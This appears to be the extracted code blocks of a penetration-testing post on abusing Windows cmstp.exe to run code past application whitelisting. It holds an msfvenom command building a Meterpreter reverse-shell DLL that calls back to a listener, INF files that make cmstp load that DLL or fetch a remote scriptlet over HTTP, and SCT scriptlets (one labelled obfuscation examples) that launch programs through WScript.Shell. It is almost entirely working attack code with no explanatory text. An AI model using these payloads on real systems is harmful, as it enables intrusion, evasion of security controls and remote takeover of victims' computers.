1
2

C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe

1

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.200.55 LPORT=4444 -f dll > idm.dll

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

[version]
Signature=$chicago$
AdvancedINF=2.5
 
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
 
[RegisterOCXSection]
C:\Users\Victim\idm.dll
 
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="idm"
ShortSvcName="idm"

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

[version]
Signature=$chicago$
AdvancedINF=2.5
 
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
 
[RegisterOCXSection]
%11%\scrobj.dll,NI,http://192.168.200.55/pentestlab.sct
 
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="idm"
ShortSvcName="idm"

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

### powersct.sct

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="Pentest"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - @netbiosX -->
	<script language="JScript">
		<![CDATA[
	
			var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe");	
	
		]]>
</script>
</registration>
</scriptlet>

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

### SCT File Obfuscation Examples:

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!--  License: BSD3-Clause -->
	<script language="JScript">
	<![CDATA[
		//x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll
		
		var scr = new ActiveXObject("MSScriptControl.ScriptControl");
		scr.Language = "JScript";
		scr.ExecuteStatement('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
		scr.Eval('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
		
		//https://msdn.microsoft.com/en-us/library/aa227637(v=vs.60).aspx
		//Lots of hints here on futher obfuscation
		]]></script>
</registration>
</scriptlet>